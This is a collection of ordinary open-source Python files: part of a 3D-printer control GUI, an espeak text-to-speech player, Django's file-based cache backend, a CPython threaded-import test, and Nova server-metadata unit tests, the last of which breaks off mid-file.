add("efeed_val", root.efeedc, container = esettingssizer, flag = wx.ALIGN_CENTER | wx.RIGHT, border = 5)
add("efeed_label", wx.StaticText(esettingspanel, -1, _("Speed:")), container = esettingssizer, flag = wx.ALIGN_LEFT)
add("efeed_unit", wx.StaticText(esettingspanel, -1, _("mm/\nmin")), container = esettingssizer, flag = wx.ALIGN_CENTER)
else:
root.efeedc = None
esettingspanel.SetSizer(esettingssizer)
add("esettings", esettingspanel, flag = wx.ALIGN_LEFT)
if not standalone_mode:
econtrolpanel = root.newPanel(parentpanel)
econtrolsizer = wx.BoxSizer(wx.HORIZONTAL)
if root.settings.extruders > 1:
etool_sel_panel = econtrolpanel
etool_label = wx.StaticText(etool_sel_panel, -1, _("Tool:"))
if root.settings.extruders == 2:
root.extrudersel = wx.Button(etool_sel_panel, -1, "0", style = wx.BU_EXACTFIT)
root.extrudersel.SetToolTip(wx.ToolTip(_("Click to switch current extruder")))
def extrudersel_cb(event):
if root.extrudersel.GetLabel() == "1":
new = "0"
else:
new = "1"
root.extrudersel.SetLabel(new)
root.tool_change(event)
root.extrudersel.Bind(wx.EVT_BUTTON, extrudersel_cb)
root.extrudersel.GetValue = root.extrudersel.GetLabel
root.extrudersel.SetValue = root.extrudersel.SetLabel
else:
choices = [str(i) for i in range(0, root.settings.extruders)]
root.extrudersel = wx.ComboBox(etool_sel_panel, -1, choices = choices,
style = wx.CB_DROPDOWN | wx.CB_READONLY,
size = (50, -1))
root.extrudersel.SetToolTip(wx.ToolTip(_("Select current extruder")))
root.extrudersel.SetValue(choices[0])
root.extrudersel.Bind(wx.EVT_COMBOBOX, root.tool_change)
root.printerControls.append(root.extrudersel)
if mini_mode:
add("etool_label", etool_label, container = esettingssizer, flag = wx.ALIGN_CENTER)
add("etool_val", root.extrudersel, container = esettingssizer)
else:
econtrolsizer.Add(etool_label, flag = wx.ALIGN_CENTER)
econtrolsizer.Add(root.extrudersel)
econtrolpanel.SetSizer(econtrolsizer)
add("ext_controls", econtrolpanel, flag = wx.EXPAND | wx.TOP, border = off_top)
ebuttonspanel = root.newPanel(parentpanel)
ebuttonssizer = wx.BoxSizer(wx.HORIZONTAL)
for key in ["extrude", "reverse", "chktemp"]:
desc = root.cpbuttons[key]
btn = make_custom_button(root, ebuttonspanel, desc,
style = wx.BU_EXACTFIT)
ebuttonssizer.Add(btn, 1, flag = wx.EXPAND)
ebuttonspanel.SetSizer(ebuttonssizer)
add("ebuttons", ebuttonspanel, flag = wx.EXPAND | wx.BOTTOM, border = off_top)
else:
for key, btn in extra_buttons.items():
add(key, btn, flag = wx.EXPAND)
class ControlsSizer(wx.GridBagSizer):
def __init__(self, root, parentpanel = None, standalone_mode = False, mini_mode = False):
super(ControlsSizer, self).__init__()
if not parentpanel: parentpanel = root.panel
if mini_mode: self.make_mini(root, parentpanel)
else: self.make_standard(root, parentpanel, standalone_mode)
def make_standard(self, root, parentpanel, standalone_mode):
lltspanel = root.newPanel(parentpanel)
llts = wx.BoxSizer(wx.HORIZONTAL)
lltspanel.SetSizer(llts)
self.Add(lltspanel, pos = (0, 0), span = (1, 6))
xyzpanel = root.newPanel(parentpanel)
self.xyzsizer = XYZControlsSizer(root, xyzpanel)
xyzpanel.SetSizer(self.xyzsizer)
self.Add(xyzpanel, pos = (1, 0), span = (1, 6), flag = wx.ALIGN_CENTER)
self.extra_buttons = {}
pos_mapping = {"extrude": (4, 0),
"reverse": (4, 2),
"chktemp": (4, 4),
}
span_mapping = {"extrude": (1, 2),
"reverse": (1, 2),
"chktemp": (1, 2),
}
for key, desc in root.cpbuttons.items():
if not standalone_mode and key in ["extrude", "reverse", "chktemp"]:
continue
panel = lltspanel if key == "motorsoff" else parentpanel
btn = make_custom_button(root, panel, desc)
if key == "motorsoff":
llts.Add(btn)
elif not standalone_mode:
self.Add(btn, pos = pos_mapping[key], span = span_mapping[key], flag = wx.EXPAND)
else:
self.extra_buttons[key] = btn
root.xyfeedc = wx.SpinCtrl(lltspanel, -1, str(root.settings.xy_feedrate), min = 0, max = 50000, size = (70, -1))
root.xyfeedc.SetToolTip(wx.ToolTip(_("Set Maximum Speed for X & Y axes (mm/min)")))
llts.Add(wx.StaticText(lltspanel, -1, _("XY:")), flag = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL | wx.LEFT, border = 5)
llts.Add(root.xyfeedc)
llts.Add(wx.StaticText(lltspanel, -1, _("mm/min Z:")), flag = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL | wx.LEFT, border = 5)
root.zfeedc = wx.SpinCtrl(lltspanel, -1, str(root.settings.z_feedrate), min = 0, max = 50000, size = (70, -1))
root.zfeedc.SetToolTip(wx.ToolTip(_("Set Maximum Speed for Z axis (mm/min)")))
llts.Add(root.zfeedc,)
root.xyfeedc.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.zfeedc.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.xyfeedc.Bind(wx.EVT_TEXT, root.setfeeds)
root.zfeedc.Bind(wx.EVT_TEXT, root.setfeeds)
root.zfeedc.SetBackgroundColour((180, 255, 180))
root.zfeedc.SetForegroundColour("black")
if not standalone_mode:
add_extra_controls(self, root, parentpanel, None)
def make_mini(self, root, parentpanel):
root.xyb = XYButtonsMini(parentpanel, root.moveXY, root.homeButtonClicked,
root.spacebarAction, root.bgcolor,
zcallback = root.moveZ)
self.Add(root.xyb, pos = (1, 0), span = (1, 4), flag = wx.ALIGN_CENTER)
root.zb = ZButtonsMini(parentpanel, root.moveZ, root.bgcolor)
self.Add(root.zb, pos = (0, 4), span = (2, 1), flag = wx.ALIGN_CENTER)
wx.CallAfter(root.xyb.SetFocus)
pos_mapping = {"motorsoff": (0, 0),
}
span_mapping = {"motorsoff": (1, 4),
}
btn = make_custom_button(root, parentpanel, root.cpbuttons["motorsoff"])
self.Add(btn, pos = pos_mapping["motorsoff"], span = span_mapping["motorsoff"], flag = wx.EXPAND)
add_extra_controls(self, root, parentpanel, None, True)
|
zepto/clipspeak
|
refs/heads/master
|
clipspeak/speaker.py
|
1
|
#!/usr/bin/env python
# vim: sw=4:ts=4:sts=4:fdm=indent:fdl=0:
# -*- coding: UTF8 -*-
#
# An object for using espeak_text for 'playing' text.
# Copyright (C) 2013 Josiah Gordon <josiahg@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" Play espeak audio data to alsa.
"""
from multiprocessing import Process, Manager, Pipe
from io import SEEK_SET, SEEK_CUR, SEEK_END
from functools import wraps as functools_wraps
from time import sleep as time_sleep
from musio.alsa_io import Alsa as AudioDevice
from .espeak_text import EspeakText
class Reader(object):
""" Play audio files.
"""
def __init__(self):
""" Player(text, **kwargs) -> Speak text.
"""
self._text = ''
# Setup the msg_dict for sending messages to the child process.
self._msg_dict = Manager().dict()
# Create a pipe for sending and receiving messages.
self._control_conn, self._player_conn = Pipe()
def __str__(self) -> str:
""" The information about the open file.
"""
return self._text
# Wait for the stream to open.
while 'info' not in self._msg_dict: pass
# Return the info string.
return self._msg_dict.get('info', '')
def __repr__(self) -> str:
""" __repr__ -> Returns a python expression to recreate this instance.
"""
repr_str = '' # "filename='%(_filename)s'" % self.__dict__
return '%s(%s)' % (self.__class__.__name__, repr_str)
def __enter__(self):
""" Provides the ability to use pythons with statement.
"""
try:
return self
except Exception as err:
print(err)
return None
def __exit__(self, exc_type, exc_value, traceback):
""" Stop playback when finished.
"""
try:
self.stop()
self._control_conn.close()
self._player_conn.close()
return not bool(exc_type)
except Exception as err:
print(err)
return False
def __del__(self):
""" Stop playback before deleting.
"""
pass
def __len__(self):
""" The length of the file if it has one.
"""
return self.length
def playing_wrapper(func):
""" Wrap methods and only call them if the stream is playing
"""
@functools_wraps(func)
def wrapper(self, *args, **kwargs):
""" Check if stream is playing and if it is then call func
otherwise print a message and exit.
"""
if not self.playing:
print("%(filename)s is not playing." % self._msg_dict)
return None
return func(self, *args, **kwargs)
return wrapper
def _play_proc(self, msg_dict: dict, pipe: Pipe):
""" Player process
"""
# Open the file to play.
with EspeakText(**msg_dict) as fileobj:
# Put the file info in msg_dict.
# msg_dict['info'] = str(fileobj)
msg_dict['length'] = fileobj.length
# Open an audio output device that can handle the data from
# fileobj.
# with AudioDevice(rate=22050, channels=1) as device:
device = AudioDevice(rate=22050, channels=1)
try:
# Set the default number of loops to infinite.
fileobj.loops = msg_dict.get('loops', -1)
# Initialize variable.
buf = b'\x00' * device.buffer_size
written = 0
# Loop until stopped or nothing read or written.
while msg_dict['playing'] and (buf or written):
# Keep playing if not paused.
if not msg_dict.get('paused', False):
# Re-open the device if it was closed.
if device.closed:
device = AudioDevice(rate=22050, channels=1)
# Read the next buffer full of data.
buf = fileobj.readline()
# Write buf.
written = device.write(buf)
else:
# Close the device when paused and sleep to
# open the audio for another process and
# save cpu cycles.
if not device.closed:
device.close()
time_sleep(0.05)
# Write a buffer of null bytes so the audio
# system can keep its buffer full.
# device.write(b'\x00' * device.buffer_size)
# Get and process any commands from the parent process.
if pipe.poll():
# Get the data into temp.
command = pipe.recv()
if 'getposition' in command:
pipe.send(fileobj.position)
elif 'setposition' in command:
fileobj.position = command['setposition']
except Exception as err:
print(err)
finally:
if not device.closed:
device.close()
# Set playing to False for the parent.
msg_dict['playing'] = False
def read(self, text: str, **kwargs):
""" Read the text.
"""
self._text = text
self._msg_dict['text'] = text
self._msg_dict.update(kwargs)
# After opening a new file stop the current one from playing.
self.stop()
# Pause it.
self.pause()
# Start it playing so seeking works.
self.play()
def play(self):
""" play() -> Start playback.
"""
if not self._msg_dict.get('playing', False):
# Set playing to True for the child process.
self._msg_dict['playing'] = True
# Open a new process to play a file in the background.
self._play_p = Process(target=self._play_proc,
args=(self._msg_dict, self._player_conn))
# Start the process.
self._play_p.start()
elif self._msg_dict.get('paused', True):
# Un-pause if paused.
self._msg_dict['paused'] = False
def stop(self):
""" stop() -> Stop playback.
"""
if self._msg_dict.get('playing', False):
# Stop playback.
self._msg_dict['playing'] = False
# Wait for the player process to stop.
self._play_p.join()
# Un-Pause.
self._msg_dict['paused'] = False
def pause(self):
""" pause() -> Pause playback.
"""
# Pause playback.
self._msg_dict['paused'] = True
@property
def paused(self) -> bool:
""" True if playback is paused.
"""
return self._msg_dict.get('paused', False)
@property
def playing(self) -> bool:
""" True if playing.
"""
return self._msg_dict.get('playing', False)
@property
def length(self) -> int:
""" Length of audio.
"""
return self._msg_dict.get('length', 0)
@property
@playing_wrapper
def position(self) -> int:
""" Current position.
"""
self._control_conn.send('getposition')
return self._control_conn.recv()
@position.setter
@playing_wrapper
def position(self, value: int):
""" Set the current position.
"""
self._control_conn.send({'setposition': int(value)})
@playing_wrapper
def tell(self) -> int:
""" tell -> Returns the current position.
"""
return self.position
|
adambrenecki/django
|
refs/heads/master
|
django/core/cache/backends/filebased.py
|
114
|
"File-based cache backend"
import hashlib
import os
import shutil
import time
try:
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from django.core.cache.backends.base import BaseCache, DEFAULT_TIMEOUT
from django.utils.encoding import force_bytes
class FileBasedCache(BaseCache):
def __init__(self, dir, params):
BaseCache.__init__(self, params)
self._dir = dir
if not os.path.exists(self._dir):
self._createdir()
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
if self.has_key(key, version=version):
return False
self.set(key, value, timeout, version=version)
return True
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
fname = self._key_to_file(key)
try:
with open(fname, 'rb') as f:
exp = pickle.load(f)
now = time.time()
if exp is not None and exp < now:
self._delete(fname)
else:
return pickle.load(f)
except (IOError, OSError, EOFError, pickle.PickleError):
pass
return default
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
fname = self._key_to_file(key)
dirname = os.path.dirname(fname)
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
self._cull()
try:
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(fname, 'wb') as f:
expiry = None if timeout is None else time.time() + timeout
pickle.dump(expiry, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
except (IOError, OSError):
pass
def delete(self, key, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
try:
self._delete(self._key_to_file(key))
except (IOError, OSError):
pass
def _delete(self, fname):
os.remove(fname)
try:
# Remove the 2 subdirs if they're empty
dirname = os.path.dirname(fname)
os.rmdir(dirname)
os.rmdir(os.path.dirname(dirname))
except (IOError, OSError):
pass
def has_key(self, key, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
fname = self._key_to_file(key)
try:
with open(fname, 'rb') as f:
exp = pickle.load(f)
now = time.time()
if exp < now:
self._delete(fname)
return False
else:
return True
except (IOError, OSError, EOFError, pickle.PickleError):
return False
def _cull(self):
if int(self._num_entries) < self._max_entries:
return
try:
filelist = sorted(os.listdir(self._dir))
except (IOError, OSError):
return
if self._cull_frequency == 0:
doomed = filelist
else:
doomed = [os.path.join(self._dir, k) for (i, k) in enumerate(filelist) if i % self._cull_frequency == 0]
for topdir in doomed:
try:
for root, _, files in os.walk(topdir):
for f in files:
self._delete(os.path.join(root, f))
except (IOError, OSError):
pass
def _createdir(self):
try:
os.makedirs(self._dir)
except OSError:
raise EnvironmentError("Cache directory '%s' does not exist and could not be created'" % self._dir)
def _key_to_file(self, key):
"""
Convert the filename into an md5 string. We'll turn the first couple
bits of the path into directory prefixes to be nice to filesystems
that have problems with large numbers of files in a directory.
Thus, a cache key of "foo" gets turnned into a file named
``{cache-dir}ac/bd/18db4cc2f85cedef654fccc4a4d8``.
"""
path = hashlib.md5(force_bytes(key)).hexdigest()
path = os.path.join(path[:2], path[2:4], path[4:])
return os.path.join(self._dir, path)
def _get_num_entries(self):
count = 0
for _,_,files in os.walk(self._dir):
count += len(files)
return count
_num_entries = property(_get_num_entries)
def clear(self):
try:
shutil.rmtree(self._dir)
except (IOError, OSError):
pass
# For backwards compatibility
class CacheClass(FileBasedCache):
pass
|
svanschalkwyk/datafari
|
refs/heads/master
|
windows/python/Lib/test/test_threaded_import.py
|
137
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import unittest
from test.test_support import verbose, TestFailed, import_module
thread = import_module('thread')
critical_section = thread.allocate_lock()
done = thread.allocate_lock()
def task():
global N, critical_section, done
import random
x = random.randrange(1, 3)
critical_section.acquire()
N -= 1
# Must release critical_section before releasing done, else the main
# thread can exit and set critical_section to None as part of global
# teardown; then critical_section.release() raises AttributeError.
finished = N == 0
critical_section.release()
if finished:
done.release()
def test_import_hangers():
import sys
if verbose:
print "testing import hangers ...",
import test.threaded_import_hangers
try:
if test.threaded_import_hangers.errors:
raise TestFailed(test.threaded_import_hangers.errors)
elif verbose:
print "OK."
finally:
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
del sys.modules['test.threaded_import_hangers']
# Tricky: When regrtest imports this module, the thread running regrtest
# grabs the import lock and won't let go of it until this module returns.
# All other threads attempting an import hang for the duration. Since
# this test spawns threads that do little *but* import, we can't do that
# successfully until after this module finishes importing and regrtest
# regains control. To make this work, a special case was added to
# regrtest to invoke a module's "test_main" function (if any) after
# importing it.
def test_main(): # magic name! see above
global N, done
import imp
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done.acquire()
for N in (20, 50) * 3:
if verbose:
print "Trying", N, "threads ...",
for i in range(N):
thread.start_new_thread(task, ())
done.acquire()
if verbose:
print "OK."
done.release()
test_import_hangers()
if __name__ == "__main__":
test_main()
|
bgxavier/nova
|
refs/heads/master
|
nova/tests/unit/api/openstack/compute/test_server_metadata.py
|
33
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils
from oslo_utils import timeutils
import six
import webob
from nova.api.openstack.compute.plugins.v3 import server_metadata \
as server_metadata_v21
from nova.api.openstack.compute import server_metadata as server_metadata_v2
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import vm_states
import nova.db
from nova import exception
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
CONF = cfg.CONF
def return_create_instance_metadata_max(context, server_id, metadata, delete):
return stub_max_server_metadata()
def return_create_instance_metadata(context, server_id, metadata, delete):
return stub_server_metadata()
def fake_instance_save(inst, **kwargs):
inst.metadata = stub_server_metadata()
inst.obj_reset_changes()
def return_server_metadata(context, server_id):
if not isinstance(server_id, six.string_types) or not len(server_id) == 36:
msg = 'id %s must be a uuid in return server metadata' % server_id
raise Exception(msg)
return stub_server_metadata()
def return_empty_server_metadata(context, server_id):
return {}
def delete_server_metadata(context, server_id, key):
pass
def stub_server_metadata():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
}
return metadata
def stub_max_server_metadata():
metadata = {"metadata": {}}
for num in range(CONF.quota_metadata_items):
metadata['metadata']['key%i' % num] = "blah"
return metadata
def return_server(context, server_id, columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE})
def return_server_by_uuid(context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'metadata': stub_server_metadata(),
'vm_state': vm_states.ACTIVE})
def return_server_nonexistent(context, server_id,
columns_to_join=None, use_slave=False):
raise exception.InstanceNotFound(instance_id=server_id)
def fake_change_instance_metadata(self, context, instance, diff):
pass
class ServerMetaDataTestV21(test.TestCase):
validation_ex = exception.ValidationError
validation_ex_large = validation_ex
def setUp(self):
super(ServerMetaDataTestV21, self).setUp()
fakes.stub_out_key_pair_funcs(self.stubs)
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
self._set_up_resources()
def _set_up_resources(self):
self.controller = server_metadata_v21.ServerMetadataController()
self.uuid = str(uuid.uuid4())
self.url = '/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequestV3.blank(self.url + param_url)
def test_index(self):
req = self._get_request()
res_dict = self.controller.index(req, self.uuid)
expected = {
'metadata': {
'key1': 'value1',
'key2': 'value2',
'key3': 'value3',
},
}
self.assertEqual(expected, res_dict)
def test_index_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = self._get_request()
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, req, self.url)
def test_index_no_data(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = self._get_request()
res_dict = self.controller.index(req, self.uuid)
expected = {'metadata': {}}
self.assertEqual(expected, res_dict)
def test_show(self):
req = self._get_request('/key2')
res_dict = self.controller.show(req, self.uuid, 'key2')
expected = {"meta": {'key2': 'value2'}}
self.assertEqual(expected, res_dict)
def test_show_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = self._get_request('/key2')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key2')
def test_show_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = self._get_request('/key6')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key6')
def test_delete(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
req = self._get_request('/key2')
req.method = 'DELETE'
res = self.controller.delete(req, self.uuid, 'key2')
self.assertIsNone(res)
def test_delete_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = self._get_request('/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key1')
def test_delete_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = self._get_request('/key6')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key6')
def test_create(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.uuid, body=body)
body['metadata'].update({
"key1": "value1",
"key2": "value2",
"key3": "value3",
})
self.assertEqual(body, res_dict)
def test_create_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'POST'
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=None)
def test_create_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_item_non_dict(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"metadata": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"metadata": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex_large,
self.controller.create,
req, self.uuid, body=body)
def test_create_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"metadata": ['asdf']}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = self._get_request()
req.method = 'POST'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, self.uuid, body=body)
def test_update_metadata(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
response = self.controller.update_all(req, self.uuid, body=expected)
self.assertEqual(expected, response)
def test_update_all(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, body=expected)
self.assertEqual(expected, res_dict)
def test_update_all_empty_container(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, body=expected)
self.assertEqual(expected, res_dict)
def test_update_all_empty_body_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=None)
def test_update_all_with_non_dict_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/bad')
req.method = 'PUT'
body = {"metadata": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=body)
def test_update_all_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=expected)
def test_update_all_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=expected)
def test_update_all_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
body = {'metadata': {'key10': 'value10'}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body=body)
def test_update_all_non_dict(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'PUT'
body = {"metadata": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex, self.controller.update_all,
req, self.uuid, body=body)
def test_update_item(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res_dict = self.controller.update(req, self.uuid, 'key1', body=body)
expected = {"meta": {'key1': 'value1'}}
self.assertEqual(expected, res_dict)
def test_update_item_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, self.uuid, 'key1',
body=body)
def test_update_item_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=None)
def test_update_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=expected)
def test_update_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=expected)
def test_update_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, '',
body=body)
def test_update_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex_large,
self.controller.update,
req, self.uuid, ("a" * 260), body=body)
def test_update_item_value_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": ("a" * 260)}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex_large,
self.controller.update,
